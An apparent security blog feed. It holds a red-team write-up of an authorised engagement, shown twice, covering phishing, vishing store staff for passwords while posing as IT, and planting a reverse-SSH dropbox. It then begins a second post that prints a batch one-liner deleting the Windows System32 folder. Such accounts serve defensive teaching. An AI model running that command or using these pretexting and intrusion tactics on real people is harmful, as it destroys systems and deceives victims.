<p>This phase turned out a lot more difficult to implement because the IT department was quite good at detecting this. It’s not something I’ve come across often while performing phishing.</p>
<h3 id="vhishing">Vhishing</h3>
<p>Our next phase would include vhishing attacks. This is where we engage with a target over the phone, in order to get them to provide us with sensitive information, or get them to perform actions on their computers for us.</p>
<p>This company had a lot of stores all over the country, so there were a lot of opportunities for vhishing. We gained a list of these stores and their contact details through OSINT.</p>
<p>It took me a few days to actually get onto the first attack. This would be the first time that I officially do this during an engagement, and I was trying to wrap my head around what the end goal is going to be here. Am I going to get them to install something like Anydesk on their PC that allowed me remote access, am I going to get them to open an email that I’ll send them that contains something reverse shell, am I going to just get their passwords, or what am I supposed to do.</p>
<p>I eventually decided I’m just going to wing it. The rough plan was :</p>
<ol>
<li>Phone them up</li>
<li>Introduce myself as John from head office IT</li>
<li>Ask to speak to someone that could be sitting in front of the computer that could assist me troubleshoot an issue</li>
<li>See what happens and go from there</li>
</ol>
<p>It took about 8 tries before I got one of the stores to actually pick up the phone. I introduced myself, and it happened to be that the person I was speaking to was actually sitting in front of the computer. I explained that we can see there is an issue with her antivirus, and we need to resolve it before something infects the computer and destroys the data.</p>
<p>This person was more than willing to assist. I said I just needed to know which username and password was being used on that computer, to make sure we’re going to be working on the right computer. Without hesititation, they provided their username and password. I took a chance and asked if they perhaps know the password for the server too, but unfortunately they did not know that.</p>
<p>I proceeded to get them to open their web browser, and see if they can go to a website. Unfortunately it appeared they were behind a proxy. I then had them open a command shell to run a ping against an external website, but there didn’t seem to be any access to the Internet from the workstation. As they were seeing an error on the screen, I decided to take this opportunity to explain to them that it appears we’re not going to be able to fix the problem remotely, so we will have to send out a IT person to come to the store. This would set us up to do a physical penetration test at this store.</p>
<p>Before ending the call, I also asked for the manager’s name, surname and cellphone number, which I was given.</p>
<p>I proceeded to phone a number of stores with a similar script, obtaining information at each store. I was surprised that with just a bit of friendliness, you can solicit information from people without it triggering any suspicion.</p>
<h4 id="a-side-note-1">A side note</h4>
<p>During one conversation, I was informed of an actual IT problem that they were experiencing. I assured her that someone would be sent to look into this issue, setting myself up for a store visit if needed. I still feel bad that I never got to that store and I hope that eventually someone did sort out her problem.</p>
<h3 id="moving-onto-the-physical-assessment">Moving onto the physical assessment</h3>
<p>With the vhishing phase done, and having set ourselves up to a reason to access the stores and the IT infrastructure there, we proceeded to the next phase, which would be the physical.</p>
<h3 id="the-recon">The Recon</h3>
<p>I had a number of stores that were relatively close to me, so I decided to do some recon on them first, before deciding which will be the target or targets.</p>
<p>One good thing about the Covid pandemic, is that we are all forced to wear masks. That makes it easier to hide. The timing was also good, because I hadn’t cut my hair in a while.</p>
<p>My plan was to try and do the following at each store:</p>
<ol>
<li>Establish what type of security is implemented. This would include determining where security guards are placed, how they interact with clients, how busy the shop is, what type of access control there is to access high value areas, how accessible these high values areas are and how much movement there is in those areas.</li>
<li>Check if there are any network connections that aren’t being used in the store somewhere. If these are available, it might be possible to put a dropbox in without anyone noticing.</li>
<li>Determine if there are any other opportunities for an attack.</li>
<li>Do a quick Wifi scan using my phone to see what access points are available.</li>
</ol>
<p>With the first store, I just went in with an open mind. And based on my plan, here is what I found:</p>
<ol>
<li>There is one security guard at the entrance, that seems very interested in making sure everyone has sanitised their hands. I observed him while making my way through the rest of the store. He appeared to be searching bags of people as they exit the store.</li>
<li>There are CCTV cameras all over.</li>
<li>The store is quite busy, with a lot of movement inside.</li>
<li>Casually browsing around, I found a vacant network connection that also had a power plug right next to it. The way it was placed, provided a perfect opportunity to place a dropbox without it being noticed. The only problem was that it was in view of the security guard, but after considering a few options around that area, I was confident I had a way to place the dropbox without drawing attention to myself.</li>
<li>I found that accessing the offices where the computers and most likely the server are stored would be easy. There was no access control, with doors open. Glancing down the passage as I walked past, I saw what looked like a server cabinet.</li>
<li>I found a number of Wifi access points active in the store, and took note of the security protocol each used.</li>
</ol>
<p>This store had ample opportunity to be a target, so I decided to head back to the office to set up and come back to see what we can achieve.</p>
<h3 id="building-the-dropbox-and-other-equipment">Building the dropbox and other equipment</h3>
<p>I’ll try and go into a little bit of details here, but my plan is to write this up into a separate article. It was my first time setting up a dropbox, so there was quite a bit of experimenting and testing that went into this. Luckily there have been plenty of red teamers before my time, and they write about it all over the Internet.</p>
<h4 id="raspberry-pi-zero-w">Raspberry Pi Zero W</h4>
<p>This was the only device available to me, while I waited for the other one to be delivered. I added a Ethernet and Battery HAT, because the device only has a built-in wifi connection. The battery was to keep it running in case of a power failure, or someone unplugging the device.</p>
<p>I installed Kali on there, because then I would automatically have all my favourite tools as well.</p>
<p>I set it up that it acted as a wireless access point (hostapd), so that I could connect to it using my phone or laptop in case I needed to do any manual setting up once I am in the store.</p>
<p>For persistence and connecting to our C2 server, I used an automated script (using autossh) to create a reverse SSH connection. I also set it up as a VPN (OpenVPN) client, to connect to our server automatically.</p>
<p>Not having a 3d printer, or able to order cases for the Pi, I had to get creative with the box I was going to use. I put on some stickers and a warning label, which would hopefully look like it fit wherever I would leave it. Everything was ready to connect to a power source and to the network connection.</p>
<p>I tested it extensively in the office, making sure that once I had a reverse SSH connection, I can access the network, perform scans and run utilities.</p>
<p>Being a developer I love automating things, so to have this dropbox fire up the first time, connect to everything it was supposed to and give me access was such an awesome moment for me.</p>
<p>The Pi device doesn’t have a lot of memory, so I knew I wouldn’t be able to run memory intensive scans like Nessus. I figured if I can just get a port scan of the network, I could pivot (proxychains) into the network and use further utilities from my own attack box.</p>
<h4 id="usb-drive">USB Drive</h4>
<p>Having a rough idea of what I’m going to face when I get access to the computers, I decided to also just prepare some utilities to use on the computers.</p>
<ul>
<li>Mimikatz (dump passwords and hashes in case I could log in as Administrator somewhere)</li>
<li>Custom built persistent reverse shell (I spent a few hours on building a reverse shell that would execute while evading antivirus and Microsoft Defender)</li>
<li>PowerView.ps1 (script to enumerate the domain)</li>
<li>plink (setup a reverse SSH on the workstations or servers)</li>
<li>Copy and paste scripts that I could use to create exclusion lists on Defender or disable it completely</li>
</ul>
<h5 id="a-side-note-2">A side note</h5>
<p>I added Mimikatz and PowerView into a password protected zip file. The last thing I wanted was to plug in the device, have the antivirus automatically scan the USB drive and then delete my utilities.</p>
<h4 id="other-equipment">Other equipment</h4>
<ul>
<li>Screwdriver (in case I needed to open the case)</li>
<li>Extra Ethernet cable, connection extender and connection splitter (in case I needed to hook into another connection that is already being used)</li>
<li>2-prong plug</li>
<li>USB charging cable</li>
<li>Laptop with Kali installed, and setup to automatically connect to the Pi via Wifi</li>
<li>Live Kali installation on a bootable USB</li>
<li>Company ID badge</li>
</ul>
<h3 id="going-to-the-shop">Going to the shop</h3>
<p>I decided to go to the store at a time I thought it would be even busier. By this time I had my hair cut, not really because of the engagement, but just coincidence.</p>
<p>By the time I stopped at the store, and got out the car, I was relatively at ease. It was as I was approaching the door that I had stream of thoughts enter my head about what could go wrong.</p>
<h4 id="a-side-note-3">A side note</h4>
<p>It’s at this point it’s worth noting that we had full permission to do what I was about to do. There is normally a letter that we get, that we can carry with us. It’s called a “get out of jail free” card. You normally pull this out if anyone that catch on to what you are doing, and want to phone the police on you. The letter contains details about why you are at the store and who they can contact at their own head offices to validate the story. For anyone attempting this, I would recommend that you always keep that letter on you.</p>
<p>As I passed through the door, my mind was completely focused, and I walked straight to the security guard. I introduced myself, explained to him that I was there to provide IT support, and asked if he would be so kind as to direct me to where the offices were. It helped that I was able to provide him a name as well of the person I’m supposed to meet. The friendly guard happily showed me which direction to go. I could probably have just walked past him to the offices, but in my mind it was important to setup this contact with the him. Now he is familiar with me, he knows why I am there, and probably won’t even look at me twice when he sees me again.</p>
<p>I walked to the offices, and had another brainwave. I got out my phone, and pretended that I was speaking to someone as I walked into the passage way that branched off to the offices. Making sure I could be heard by anyone in earshot, I pretended that I was telling the IT department that I just arrived and I will give them a “sitrep” as soon as I know what is going on. This worked out perfectly, because someone actually heard me and came out of their office before I even “hang up”. They looked at me, and asked if I’m from the IT department. I confirmed that I was, and gave them the name of the person (manager name that I obtained through the vhishing) I needed to make contact with. This happened to be the same person standing in front of me.</p>
<p>With that first point of contact out of the way, and having gone smoothly, I now had access to the office, and the computers it contained.</p>
<h4 id="successes">Successes</h4>
<ul>
<li>I had full access to the server cabinet, and in fact I could close the door behind me in the server room and carry on uninterupted.</li>
<li>All workstations were logged in as local administrator users.</li>
<li>The server was logged in as Administrator.</li>
<li>The dropbox worked and I could access it via Wifi.</li>
<li>As I had access to the server cabinet, I didn’t need to hide the dropbox, I just plugged it directly into the network switch.</li>
<li>Disabling the antivirus or creating exception rules didn’t require passwords.</li>
<li>Workstations were all logged into various sensitive applications.</li>
</ul>
<h4 id="little-hurdles">Little hurdles</h4>
<ul>
<li>There was no DHCP on the network, so through a bit of trial and error I found an IP address I could use</li>
</ul>
<h4 id="failures">Failures</h4>
<ul>
<li>No Internet connectivity on any of the computers, servers or dropbox (no reverse shell, no reverse SSH).</li>
<li>Mimikatz didn’t work because the version of the operating systems were so outdated.</li>
<li>Powerview not available on the server or workstation.</li>
</ul>
<p>I decided to limit my time to about an hour on site, before I made contact with the manager again. I explained that I couldn’t determine yet what the issue was, and that I would have to come back later, or the following day. They were quite happy with this, so I left.</p>
<p>On the way out, I greeted the security guard again, and he must’ve felt comfortable with my presence, because he did not search my bags on the way out.</p>
<h3 id="back-to-the-drawing-board">Back to the drawing board</h3>
<p>We needed a way to access my dropbox once it was connected to their network. We decided to put a 3G router in the dropbox container as well, which would then give it connection to the Internet. This way the reverse SSH and VPN connection would run though that 3G connection, while still giving access to the local network via the network cable.</p>
<p>I also got a version of Mimikatz onto my flash drive that should work on the older operating systems.</p>
<p>As with the previous visit to the store, just before I reach the doorway of the store, I have the same rush of thoughts of everything that could go wrong. It’s amplified this time because at the entrance they have “cash in transit” security guards busy loading money from an ATM. For some reason the big guns they are carry makes it an especially scary moment for me. I force myself not to hesitate though, because I don’t want my nervousness to set these guys off.</p>
<h4 id="a-side-note-4">A side note</h4>
<p>In our country, “cash in transit” security guards are often (daily) targeted because of the valuable items they transport. It’s for this reason that they are extra alert.</p>
<p>I pass them and by the time I walk past the security guard, this time just greeting him in passing, I am focused again.</p>
<p>I make my way to the manager to just let them know I am back, and proceed to the server room. I start getting my stuff unpacked, and I hook my dropbox directly into the network switch again. Within a minute or so, I pick up that the reverse SSH connection had successfully established, and I can access the dropbox from our C2 server.</p>
<p>While trying to get Mimikatz to run on the server (which for some reason still doesn’t want to), an automated task starts up and displays information on the screen. I take note of a username and password that appears on the screen. It’s cleartext credentials for another server.</p>
<p>With remote access gained, I head back to the office to move onto the next phase.</p>
<h3 id="lets-start">Let’s start</h3>
<p>The first thing I do is start with device enumeration, to see what devices and IP ranges I can access. It goes good for a few minutes, and then it freezes. I lose access, and cannot get it back. I decide to leave it for a while, to see if it comes back up.</p>
<p>When I was at the store on this day, I noticed that in the server room it was extremely hot. It’s worth noting the server room is just a little room, with no airconditioning. I realised that the Pi must be freezing up because of the heat.</p>
<p>After an hour, there is still nothing.</p>
<h3 id="nope-lets-try-again">Nope, let’s try… again</h3>
<p>I decide that because I basically have carte blanche in their offices, and no one really pays any attention to me because they are all familiar with me by this time, I might as well just set up a laptop with Kali, and go put it in the server cabinet. There is no need for any stealth at this stage.</p>
<p>I set up a laptop with the same reverse connection functionality as the dropbox.</p>
<p>I head back with my laptop, hook it up into the server cabinet, make sure I have remote access, and head back to the office. By now I have been there so many times I feel like I actually belong there, so it doesn’t even cross my mind that I’m not supposed to be there.</p>
<h3 id="finally">Finally</h3>
<p>Once I was back at the office the actual work of hacking could start. We figured out we could access the complete network, and very soon after our initial discovery scanning we were able to compromise the Active Directory domain.</p>
<p>We were able to determine a number of ways we can compromise the domain controller, including a path that involved using the credentials we obtained from the phishing attack.</p>
<h4 id="a-side-note-5">A side note</h4>
<p>It’s worth noting that compromising the domain controller without valid credentials initially is a lot more worrysome. This means that we could’ve skipped the whole phishing and vhishing attack to gain credentials and still be successful.</p>
<p>The laptop was fetched from the store a short while after, again without any questions being asked why IT equipment was being carried out the store.</p>
<h3 id="lessons-i-learned">Lessons I learned</h3>
<ul>
<li>Be prepared for anything</li>
<li>Roll with whatever happens</li>
<li>If you can establish a rapor with someone, you are seen as a “familiar”</li>
<li>Be confident and act like you belong</li>
</ul>
<h3 id="protecting-your-company">Protecting your company</h3>
<ul>
<li>Enable 2FA for any login portals that are accesible from the Internet</li>
<li>When a phishing attack is noticed, communicate by means other than email that an attacker might have access to</li>
<li>Provide ongoing training to staff members about phishing and vhishing attacks, carefully explaining to them the impact</li>
<li>Make sure policies are in place to cater for external service providers access to stores</li>
<li>Do not neglect physical access security</li>
<li>Segment the network in such a way that compromising one store does not give the attacker access to the complete network</li>
</ul>chrismeistreRed Teaming - My first physical assessment By chrismeistre I’ve recently been given the opportunity to perform my first physical assessment during a black box engagement for a client. In short, the black box permitted us to try anything to gain access to their infrastructure, and assess their IT security awareness and defenses. I was excited about this, and when the time finally came, I wasn’t left wanting. If you’re reading this as an aspiring hacker, or just someone interested in cyber security or the infosec community, you’ve probably heard at least one story of a red teamer performing a physical assessment. I have listened to many interviews and read stories, so I thought I knew what to expect. The TD;LR is that it’s definitely not as hard as I imagined it would be. What I’d like to discuss in this article are the technical (a few) and social engineering (a lot) aspects of this engagement. Our goal We decided that our goal for this engagement would be to fully compromise their internal network, and take over the domain controller. There was a feeling in the team that if we could just gain access into the internal network, the escalation to taking over the domain controller should not be too hard. A side note It is normally the case that once we get on the internal network, we’re able to escalate to a domain administrator with relative ease. Especially for companies that haven’t gone through an internal vulnerability assessment or penetration test. A lot of companies spend all their time and money on securing they external facing infrastructure, which is definitely a good thing. They do however forget that their internal network could be riddled with opportunities for an attacker. The start of the engagement Whenever we start with an engagement, we go through a checklist of things to do. Amongst other things, it involves: Obtaining information (through OSINT) about the company and their employees Compile a list of externally accessible devices (domains and IPs) Do enumeration on the devices to determine what services are accessible to us Look for low hanging fruit and/or weaknesses to exploit from the comfort of our offices During this black box, we spent a good number of days with the first phase. Although we found a number of critical vulnerabilities, it was not anything that would gain us access into the internal network. Phishing The second phase involved performing a phishing attack on the company. The goal of phishing during a black box engagement is different to just performing a phishing attack assessment. For a black box, we are not testing to see how many clicks there are, or how many credentials are captured. We want to obtain valid credentials, and at the same time go undetected. We were able to obtain a small number of valid emails addresses through OSINT. I’m still working on my own methodology for phishing attacks, but here are a few things I do, which have proved quite successful so far: Register a domain that is very similar to the company’s domain. An example would be if you’re going to attack google.com, perhaps something like googlesupport.com is a good idea. We have also registered a number of domain names that are generic. I alternate between using a very targetted domain and generic ones, depending on who the target is. Use web portals that you find during the first phase (enumerating) of the engagement, and setup a login page that looks similar. A lot of our clients are using security and spam solutions for emails, so it’s been getting a lot more difficult to create email content and fake pages based on ones that already exist. This is where my experience as a web application developer comes in, as I’m able to create pages pretty much from scratch, to still look the same, but be totally different. I also have a very generic login page that I use, where I just swop out the client’s logo each time. Craft the emails that will go out to seem urgent enough that if they don’t respond soon, they might end off in trouble. This is also where a lot of time is spent, to compile and send off emails to see if it triggers any junk, spam or malicious filters. Once the credentials are submitted on the page, redirect them to a page or a document that you appear legitimate. It’s good if you can find a page that is hosted on their own website. If nothing happens when they submit their credentials on the form, they might contact the IT department to determine if something is the matter. The first attempt at the phishing attack was not successful. We did not even get one click, which was very surprising to me, because this specific combination of email and landing page has always been successfully used. I let it be for a few days, and then started delving into why it could possibly not have worked. It turned out that due to an error on our server, at the exact time we started the phishing campaign, none of the emails even reached the targets. With this information at hand, we launched another attack. This time there was nothing for about 30 minutes, which is also odd, so I thought we had another issue. My frustration subsided as soon as the notification came in that we had a data submission. This means a target had clicked on the linked in the email, went to our fake site and filled in their username and password. We used this information to access this person’s emails. Looking for keywords in their emails, we learned the following: The VPN software they are using has enabled 2FA on it. This meant that if we wanted to gain access through their VPN, we would have to gain access to this person’s cellphone or do a vhishing attack to obtain the auth token needed to complete the 2FA request while connecting to the VPN. We found a number of usernames and passwords used to access external services. We observed that the IT department had noticed our phishing attacks, and warned the users that if they have clicked on the link in the email, to immediately contact the IT support team to change passwords. To make sure our compromised user did not see that email, we deleted it from their inbox. A complete contact list is available in the directory functionality of the webmail software, which allowed us to get a list of a lot more targets for a phishing attack. We could also set it up that the emails are sent directly from this person’s email address by making use of the webmail functionality. Based on the information we found about the steps taken when the phishing attack was noticed, we proceeded with a third attack. We chose a smaller set of email addresses from users that appeared to be in less technical positions. The thinking is that users like these would be less likely to detect that the email they are receiving is not legitimate. We were again able to get at least one submission of valid credentials before the IT department detected the attack and proceeded to act against it. The password was changed the day after our attack. Obtaining a valid set of credentials ended up being very important to us, even though we couldn’t use it to gain access to the internal network from the external devices with it. This phase turned out a lot more difficult to implement because the IT department was quite good at detecting this. It’s not something I’ve come across often while performing phishing. Vhishing Our next phase would include vhishing attacks. This is where we engage with a target over the phone, in order to get them to provide us with sensitive information, or get them to perform actions on their computers for us. This company had a lot of stores all over the country, so there were a lot of opportunities for vhishing. We gained a list of these stores and their contact details through OSINT. It took me a few days to actually get onto the first attack. This would be the first time that I officially do this during an engagement, and I was trying to wrap my head around what the end goal is going to be here. Am I going to get them to install something like Anydesk on their PC that allowed me remote access, am I going to get them to open an email that I’ll send them that contains something reverse shell, am I going to just get their passwords, or what am I supposed to do. I eventually decided I’m just going to wing it. The rough plan was : Phone them up Introduce myself as John from head office IT Ask to speak to someone that could be sitting in front of the computer that could assist me troubleshoot an issue See what happens and go from there It took about 8 tries before I got one of the stores to actually pick up the phone. I introduced myself, and it happened to be that the person I was speaking to was actually sitting in front of the computer. I explained that we can see there is an issue with her antivirus, and we need to resolve it before something infects the computer and destroys the data. This person was more than willing to assist. I said I just needed to know which username and password was being used on that computer, to make sure we’re going to be working on the right computer. Without hesititation, they provided their username and password. I took a chance and asked if they perhaps know the password for the server too, but unfortunately they did not know that. I proceeded to get them to open their web browser, and see if they can go to a website. Unfortunately it appeared they were behind a proxy. I then had them open a command shell to run a ping against an external website, but there didn’t seem to be any access to the Internet from the workstation. As they were seeing an error on the screen, I decided to take this opportunity to explain to them that it appears we’re not going to be able to fix the problem remotely, so we will have to send out a IT person to come to the store. This would set us up to do a physical penetration test at this store. Before ending the call, I also asked for the manager’s name, surname and cellphone number, which I was given. I proceeded to phone a number of stores with a similar script, obtaining information at each store. I was surprised that with just a bit of friendliness, you can solicit information from people without it triggering any suspicion. A side note During one conversation, I was informed of an actual IT problem that they were experiencing. I assured her that someone would be sent to look into this issue, setting myself up for a store visit if needed. I still feel bad that I never got to that store and I hope that eventually someone did sort out her problem. Moving onto the physical assessment With the vhishing phase done, and having set ourselves up to a reason to access the stores and the IT infrastructure there, we proceeded to the next phase, which would be the physical. The Recon I had a number of stores that were relatively close to me, so I decided to do some recon on them first, before deciding which will be the target or targets. One good thing about the Covid pandemic, is that we are all forced to wear masks. That makes it easier to hide. The timing was also good, because I hadn’t cut my hair in a while. My plan was to try and do the following at each store: Establish what type of security is implemented. This would include determining where security guards are placed, how they interact with clients, how busy the shop is, what type of access control there is to access high value areas, how accessible these high values areas are and how much movement there is in those areas. Check if there are any network connections that aren’t being used in the store somewhere. If these are available, it might be possible to put a dropbox in without anyone noticing. Determine if there are any other opportunities for an attack. Do a quick Wifi scan using my phone to see what access points are available. With the first store, I just went in with an open mind. And based on my plan, here is what I found: There is one security guard at the entrance, that seems very interested in making sure everyone has sanitised their hands. I observed him while making my way through the rest of the store. He appeared to be searching bags of people as they exit the store. There are CCTV cameras all over. The store is quite busy, with a lot of movement inside. Casually browsing around, I found a vacant network connection that also had a power plug right next to it. The way it was placed, provided a perfect opportunity to place a dropbox without it being noticed. The only problem was that it was in view of the security guard, but after considering a few options around that area, I was confident I had a way to place the dropbox without drawing attention to myself. I found that accessing the offices where the computers and most likely the server are stored would be easy. There was no access control, with doors open. Glancing down the passage as I walked past, I saw what looked like a server cabinet. I found a number of Wifi access points active in the store, and took note of the security protocol each used. This store had ample opportunity to be a target, so I decided to head back to the office to set up and come back to see what we can achieve. Building the dropbox and other equipment I’ll try and go into a little bit of details here, but my plan is to write this up into a separate article. It was my first time setting up a dropbox, so there was quite a bit of experimenting and testing that went into this. Luckily there have been plenty of red teamers before my time, and they write about it all over the Internet. Raspberry Pi Zero W This was the only device available to me, while I waited for the other one to be delivered. I added a Ethernet and Battery HAT, because the device only has a built-in wifi connection. The battery was to keep it running in case of a power failure, or someone unplugging the device. I installed Kali on there, because then I would automatically have all my favourite tools as well. I set it up that it acted as a wireless access point (hostapd), so that I could connect to it using my phone or laptop in case I needed to do any manual setting up once I am in the store. For persistence and connecting to our C2 server, I used an automated script (using autossh) to create a reverse SSH connection. I also set it up as a VPN (OpenVPN) client, to connect to our server automatically. Not having a 3d printer, or able to order cases for the Pi, I had to get creative with the box I was going to use. I put on some stickers and a warning label, which would hopefully look like it fit wherever I would leave it. Everything was ready to connect to a power source and to the network connection. I tested it extensively in the office, making sure that once I had a reverse SSH connection, I can access the network, perform scans and run utilities. Being a developer I love automating things, so to have this dropbox fire up the first time, connect to everything it was supposed to and give me access was such an awesome moment for me. The Pi device doesn’t have a lot of memory, so I knew I wouldn’t be able to run memory intensive scans like Nessus. I figured if I can just get a port scan of the network, I could pivot (proxychains) into the network and use further utilities from my own attack box. USB Drive Having a rough idea of what I’m going to face when I get access to the computers, I decided to also just prepare some utilities to use on the computers. Mimikatz (dump passwords and hashes in case I could log in as Administrator somewhere) Custom built persistent reverse shell (I spent a few hours on building a reverse shell that would execute while evading antivirus and Microsoft Defender) PowerView.ps1 (script to enumerate the domain) plink (setup a reverse SSH on the workstations or servers) Copy and paste scripts that I could use to create exclusion lists on Defender or disable it completely A side note I added Mimikatz and PowerView into a password protected zip file. The last thing I wanted was to plug in the device, have the antivirus automatically scan the USB drive and then delete my utilities. Other equipment Screwdriver (in case I needed to open the case) Extra Ethernet cable, connection extender and connection splitter (in case I needed to hook into another connection that is already being used) 2-prong plug USB charging cable Laptop with Kali installed, and setup to automatically connect to the Pi via Wifi Live Kali installation on a bootable USB Company ID badge Going to the shop I decided to go to the store at a time I thought it would be even busier. By this time I had my hair cut, not really because of the engagement, but just coincidence. By the time I stopped at the store, and got out the car, I was relatively at ease. It was as I was approaching the door that I had stream of thoughts enter my head about what could go wrong. A side note It’s at this point it’s worth noting that we had full permission to do what I was about to do. There is normally a letter that we get, that we can carry with us. It’s called a “get out of jail free” card. You normally pull this out if anyone that catch on to what you are doing, and want to phone the police on you. The letter contains details about why you are at the store and who they can contact at their own head offices to validate the story. For anyone attempting this, I would recommend that you always keep that letter on you. As I passed through the door, my mind was completely focused, and I walked straight to the security guard. I introduced myself, explained to him that I was there to provide IT support, and asked if he would be so kind as to direct me to where the offices were. It helped that I was able to provide him a name as well of the person I’m supposed to meet. The friendly guard happily showed me which direction to go. I could probably have just walked past him to the offices, but in my mind it was important to setup this contact with the him. Now he is familiar with me, he knows why I am there, and probably won’t even look at me twice when he sees me again. I walked to the offices, and had another brainwave. I got out my phone, and pretended that I was speaking to someone as I walked into the passage way that branched off to the offices. Making sure I could be heard by anyone in earshot, I pretended that I was telling the IT department that I just arrived and I will give them a “sitrep” as soon as I know what is going on. This worked out perfectly, because someone actually heard me and came out of their office before I even “hang up”. They looked at me, and asked if I’m from the IT department. I confirmed that I was, and gave them the name of the person (manager name that I obtained through the vhishing) I needed to make contact with. This happened to be the same person standing in front of me. With that first point of contact out of the way, and having gone smoothly, I now had access to the office, and the computers it contained. Successes I had full access to the server cabinet, and in fact I could close the door behind me in the server room and carry on uninterupted. All workstations were logged in as local administrator users. The server was logged in as Administrator. The dropbox worked and I could access it via Wifi. As I had access to the server cabinet, I didn’t need to hide the dropbox, I just plugged it directly into the network switch. Disabling the antivirus or creating exception rules didn’t require passwords. Workstations were all logged into various sensitive applications. Little hurdles There was no DHCP on the network, so through a bit of trial and error I found an IP address I could use Failures No Internet connectivity on any of the computers, servers or dropbox (no reverse shell, no reverse SSH). Mimikatz didn’t work because the version of the operating systems were so outdated. Powerview not available on the server or workstation. I decided to limit my time to about an hour on site, before I made contact with the manager again. I explained that I couldn’t determine yet what the issue was, and that I would have to come back later, or the following day. They were quite happy with this, so I left. On the way out, I greeted the security guard again, and he must’ve felt comfortable with my presence, because he did not search my bags on the way out. Back to the drawing board We needed a way to access my dropbox once it was connected to their network. We decided to put a 3G router in the dropbox container as well, which would then give it connection to the Internet. This way the reverse SSH and VPN connection would run though that 3G connection, while still giving access to the local network via the network cable. I also got a version of Mimikatz onto my flash drive that should work on the older operating systems. As with the previous visit to the store, just before I reach the doorway of the store, I have the same rush of thoughts of everything that could go wrong. It’s amplified this time because at the entrance they have “cash in transit” security guards busy loading money from an ATM. For some reason the big guns they are carry makes it an especially scary moment for me. I force myself not to hesitate though, because I don’t want my nervousness to set these guys off. A side note In our country, “cash in transit” security guards are often (daily) targeted because of the valuable items they transport. It’s for this reason that they are extra alert. I pass them and by the time I walk past the security guard, this time just greeting him in passing, I am focused again. I make my way to the manager to just let them know I am back, and proceed to the server room. I start getting my stuff unpacked, and I hook my dropbox directly into the network switch again. Within a minute or so, I pick up that the reverse SSH connection had successfully established, and I can access the dropbox from our C2 server. While trying to get Mimikatz to run on the server (which for some reason still doesn’t want to), an automated task starts up and displays information on the screen. I take note of a username and password that appears on the screen. It’s cleartext credentials for another server. With remote access gained, I head back to the office to move onto the next phase. Let’s start The first thing I do is start with device enumeration, to see what devices and IP ranges I can access. It goes good for a few minutes, and then it freezes. I lose access, and cannot get it back. I decide to leave it for a while, to see if it comes back up. When I was at the store on this day, I noticed that in the server room it was extremely hot. It’s worth noting the server room is just a little room, with no airconditioning. I realised that the Pi must be freezing up because of the heat. After an hour, there is still nothing. Nope, let’s try… again I decide that because I basically have carte blanche in their offices, and no one really pays any attention to me because they are all familiar with me by this time, I might as well just set up a laptop with Kali, and go put it in the server cabinet. There is no need for any stealth at this stage. I set up a laptop with the same reverse connection functionality as the dropbox. I head back with my laptop, hook it up into the server cabinet, make sure I have remote access, and head back to the office. By now I have been there so many times I feel like I actually belong there, so it doesn’t even cross my mind that I’m not supposed to be there. Finally Once I was back at the office the actual work of hacking could start. We figured out we could access the complete network, and very soon after our initial discovery scanning we were able to compromise the Active Directory domain. We were able to determine a number of ways we can compromise the domain controller, including a path that involved using the credentials we obtained from the phishing attack. A side note It’s worth noting that compromising the domain controller without valid credentials initially is a lot more worrysome. This means that we could’ve skipped the whole phishing and vhishing attack to gain credentials and still be successful. The laptop was fetched from the store a short while after, again without any questions being asked why IT equipment was being carried out the store. Lessons I learned Be prepared for anything Roll with whatever happens If you can establish a rapor with someone, you are seen as a “familiar” Be confident and act like you belong Protecting your company Enable 2FA for any login portals that are accesible from the Internet When a phishing attack is noticed, communicate by means other than email that an attacker might have access to Provide ongoing training to staff members about phishing and vhishing attacks, carefully explaining to them the impact Make sure policies are in place to cater for external service providers access to stores Do not neglect physical access security Segment the network in such a way that compromising one store does not give the attacker access to the complete networkGetting into Infosec/Cyber Security2021-11-24T00:00:00+00:002021-11-24T00:00:00+00:00https://hacksouth.africa/careers/getting-into-infosec<p><img src="/assets/images/getintoinfosec/preview2.jpg" alt="Preview" class="align-center" /></p>
<p><strong>My journey into cyber security/infosec.</strong><br />
By <strong>Sp3ctrlM0nki3</strong></p>
<p>So, I’ll start at the beginning. My passion for cyber sec started in a computer lab in high school where I created my first ‘virus’. It was a little <strong><span style="color: yellow">.bat</span></strong> virus which would remove the <strong><span style="color: yellow">System 32 Folder</span></strong> from your windows system.
<strong><span style="color: yellow"><code>del c:WINDOWSsystem32*.*/q </code>[1]</span></strong><br />
<!--more--></p>
<h3 id="tldr">TL;DR</h3>
<p><a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-2-The-Learning-Curve">The Learning Curve</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-3-Skills-loading-in-progress">Skills loading in progress</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-4-The-Wild-Hunt">The Wild Hunt</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-5-He-shoots-He-scores">He shoots, He scores</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-6-Mamma-I-made-it">Mamma I made it</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-7-Pay-It-Forward">Pay It Forward</a><br />
<a href="https://hacksouth.africa/community/Getting-into-Infosec-Cyber-Security/#step-8-Be-a-Part-of-Something-Great">Be a Part of Something Great</a></p>
<p>From there I was hooked but unfortunately in the pursuit of career vs passion, career won, and cyber sec had to take a back seat – although never leaving.
Fast forward many years later and I find myself the victim of a global pandemic [along with many others] and with the onset of COVID19, I lost my job, and the world went into a lockdown. I was left with the daunting question of what to do now, I spent most of my working career in the Hospitality sector, dabbling here and there in the IT sphere.
In my previous position I was the Contracts & Negotiation Manager for a Tour company but also, IT support/ Helpdesk / the IT liaison for our external supplier / Database admin as well as IT procurement. Clearly an abuse of my passion by the company but I digress.</p>
<p><img src="https://media.giphy.com/media/q1mHcB8wOCWf6/giphy.gif" alt="Homer Studying" class="align-center" /></p>
<h3 id="the-learning-curve">The Learning Curve</h3>
<p>So left with the decision of what to do now, I took this as the opportunity to pursue my passion of cyber security. I now had the opportunity, and this was it, I took everything I had and invested in myself studying and learning all that I could, and between April 2020 through to October 2020. I studied remotely and earned 14 certifications/course certifications all ranging from – <strong><span style="color: yellow">A+ / N+ / Sec+ / Server+ / CASP+ / CISA / CySA+ / CCNA and my CEH v10</span></strong></p>
